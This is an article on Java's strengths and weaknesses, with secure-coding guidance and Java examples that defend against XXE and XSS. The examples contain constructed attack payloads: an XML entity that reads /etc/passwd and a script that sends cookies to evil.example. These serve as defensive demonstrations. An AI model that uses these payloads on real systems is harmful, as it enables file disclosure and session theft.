What is Java?
Java is a general-purpose programming language designed with one mantra in mind: "write once, run anywhere." Java source is compiled into bytecode that runs on any implementation of the Java Virtual Machine (JVM); the JVM bridges the gap between that bytecode and the machine code of the host, so any device with a JVM installed can run a Java program. In web development, Java features most prominently as a server-side language, and it is one of the primary languages for Android apps. It once had a front-end presence through Java applets, but browsers have dropped the plug-in that ran them and the Applet API has been deprecated, largely because of security concerns.
Advantages of Java
As a general-purpose language that serves as the backbone of many enterprise applications, Java's advantages include:
- Widely used for enterprise, desktop, and Android apps. Java has a large, active developer community and a mature ecosystem of libraries, frameworks, and tools for almost every need.
- Short learning curve. Java's long history and ubiquity mean there are plenty of tutorials, guides, and courses. If you encounter a problem, chances are high your question has already been answered on Stack Overflow.
- Cross-platform portability. The JVM makes it possible to run the same compiled Java app on any device or operating system that has a JVM installed.
- Built-in concurrency. Java's standard library ships threads, synchronization primitives, and the java.util.concurrent executors and concurrent collections, which makes it straightforward to run tasks in parallel.
- Speed and performance. Java compiles to bytecode that the JVM interprets and then JIT-compiles at runtime, so startup is slower than a purely interpreted script, but long-running code is fast once hot.
Disadvantages of Java
Cons of using Java include:
- Security vulnerabilities. Because Java has been around a long time and has a huge installed base, its common weaknesses are well documented for defenders and attackers alike, and exploits for them are worth writing. Java programmers must be vigilant about security best practices such as keeping the JDK, libraries, and frameworks up to date and hardening the parsers and database access paths described below.
- Memory footprint. Java is known for high memory use: the JVM heap, class metadata, and JIT code caches all cost RAM, and each thread reserves its own stack (commonly 1 MB by default on 64-bit platforms, tunable with -Xss), so the price of thread-level concurrency is paid in memory.
- Strictly object-oriented. Java requires the developer to express even small programs in terms of classes and their relationships. That gives access to inheritance, encapsulation, and polymorphism, but it also adds ceremony for small programs and scripts.
Java security vulnerabilities and best practices
Common Java security vulnerabilities include:
- SQL injection occurs when a web application builds a database query by concatenating untrusted input (from forms, URL parameters, headers, or other UI components) into the SQL text. The attacker then supplies input that changes the structure of the query and executes SQL of their choosing on the back end. The fix is to keep query structure and data separate by using prepared statements or parameterized queries everywhere and never building dynamic SQL from user input; input validation is useful defence in depth, but escaping alone is not a reliable substitute.
- XML external entities (XXE) are a known weakness of XML parsers, including the ones in the JDK and common Java libraries. An XML document may carry a DTD that declares an external entity whose SYSTEM identifier points at a local file or a URL; when a weakly configured parser processes such input, it resolves the entity and the attacker can read files on the host (e.g., stored user data or credentials), reach internal services (server-side request forgery and port scanning), or exhaust memory with entity expansion (denial of service). The best way to prevent XXE is to disable DTD processing entirely. In cases where some DTD processing is required, disable external general and parameter entities and external DTD loading, enable the parser's secure-processing limits, and back that up with static analysis of the code that configures parsers.
- Cross-site scripting (XSS). When an application writes untrusted data into a page without encoding it for the context it lands in, the attacker's input is interpreted as HTML or script and runs in the browser with the site's own origin, so it can read cookies, session tokens, and page content. The key to preventing XSS is to validate input on arrival, encode data on output using an encoder matched to the context (HTML text, attribute, JavaScript, URL), and send response headers (correct Content-Type, X-Content-Type-Options: nosniff) so browsers interpret your data as intended. Finally, a content security policy (CSP) limits where scripts may load from and can block and report injected script as defence in depth, though it does not remove the underlying encoding bug.
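The XXE bullet above names two configurations, "no DTDs at all" and "DTDs allowed but external entities off". The following added example (not from the original article) builds both with the JDK's own javax.xml.parsers API and feeds each a constructed payload whose DOCTYPE declares an external entity pointing at /etc/passwd. The feature URIs are the Xerces ones that the JDK's built-in parser supports; the payload and the element names are constructed for the demo.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/** Added example: hardened DocumentBuilderFactory configurations against a constructed XXE payload. */
public class XxeDemo {

    // Constructed attacker payload: the DTD declares an external entity whose
    // SYSTEM identifier is a local file, then references it where ordinary
    // application data is expected. A default factory would resolve it and
    // return the file's contents as the customer name.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE order [\n"
      + "  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n"
      + "]>\n"
      + "<order><customer>&xxe;</customer></order>";

    // Preferred: refuse any DOCTYPE. With no DTD there is no way to declare
    // an entity at all, external or internal, so this also stops entity
    // expansion (billion laughs) attacks.
    static DocumentBuilderFactory strictFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Fallback when the application genuinely needs a DTD: keep the DOCTYPE
    // but forbid external general and parameter entities and external DTD
    // loading, and keep secure processing on so entity expansion is capped.
    static DocumentBuilderFactory dtdTolerantFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parses the document and returns the text of the first <customer> element.
    static String parseCustomer(DocumentBuilderFactory f, String xml) throws Exception {
        DocumentBuilder b = f.newDocumentBuilder();
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getElementsByTagName("customer").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        try {
            parseCustomer(strictFactory(), PAYLOAD);
            System.out.println("strict factory accepted a DOCTYPE: misconfigured");
        } catch (SAXParseException e) {
            System.out.println("strict factory rejected payload: " + e.getMessage());
        }
        try {
            String customer = parseCustomer(dtdTolerantFactory(), PAYLOAD);
            System.out.println("DTD-tolerant factory: external entity not resolved, customer text = '"
                + customer + "'");
        } catch (SAXParseException e) {
            System.out.println("DTD-tolerant factory rejected payload: " + e.getMessage());
        }
    }
}
```

The same discipline applies to the other JDK parsers: for StAX, set XMLInputFactory.SUPPORT_DTD to false (or, if DTDs are needed, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES to false), and for SAX set the same feature URIs on the SAXParserFactory. Centralize this in one factory method and have static analysis flag any parser created elsewhere.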
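For the XSS bullet, this added example (not from the original article) shows output encoding at the point where untrusted data enters an HTML page, together with the response headers the text recommends. The encoder is hand-written here only to keep the example dependency-free; in production use a maintained library such as the OWASP Java Encoder. The greeting template, the header values, and the sample attack string are constructed for the demo.

```java
import java.util.Map;

/** Added example: context-specific HTML encoding plus headers that back it up. */
public class HtmlOutput {

    // Encoder for HTML text and quoted attribute values. Every character that
    // can change the HTML parser's state is replaced by a character reference;
    // everything else passes through unchanged. This encoding is NOT
    // sufficient inside <script>, URLs, or CSS, which need their own encoders.
    static String escapeHtml(String untrusted) {
        StringBuilder sb = new StringBuilder(untrusted.length() + 16);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Renders a greeting. The untrusted display name is encoded at output
    // time, so an injected "<script>" remains visible text rather than
    // becoming an element the browser executes.
    static String renderGreeting(String displayName) {
        return "<p>Hello, " + escapeHtml(displayName) + "!</p>";
    }

    // Headers that make the browser honour the encoding above and limit the
    // damage if an encoding mistake slips through. This CSP allows scripts
    // only from the page's own origin, so injected inline script is blocked;
    // it is defence in depth, not a replacement for encoding.
    static Map<String, String> securityHeaders() {
        return Map.of(
            "Content-Type", "text/html; charset=UTF-8",
            "X-Content-Type-Options", "nosniff",
            "Content-Security-Policy",
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    }

    public static void main(String[] args) {
        // Constructed attack string: a cookie-stealing script posing as a user name.
        String attack = "<script>location='https://evil.example/?c='+document.cookie</script>";
        System.out.println(renderGreeting(attack));
        securityHeaders().forEach((name, value) -> System.out.println(name + ": " + value));
    }
}
```

In a servlet the headers are applied with HttpServletResponse.setHeader(name, value) before the body is written. Note that a CSP as strict as this one also blocks the application's own inline scripts and event handlers, which is the intended trade-off: move them to same-origin files so that anything inline is, by construction, untrusted.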
You should consider Java if your project involves…
- Android Apps
- Enterprise Software
- Scientific Computing
- Big Data Analytics
- Embedded and hardware programming
- Server-side technologies like Apache Tomcat, JBoss, Geronimo, GlassFish, etc.
You should consider JavaScript if your project involves…
- Dynamic single page applications (SPAs)
- Front-End technologies like jQuery, AngularJS, Backbone.js, Ember.js, ReactJS etc.
- Server-Side technologies like Node.js, MongoDB, Express.js, etc.
- Mobile App Development through PhoneGap, React Native, etc.
Keep in mind that neither list is exhaustive; they are only meant as a starting point to help you get a feel for what you can expect and which keywords you can use to assess the best language for your needs.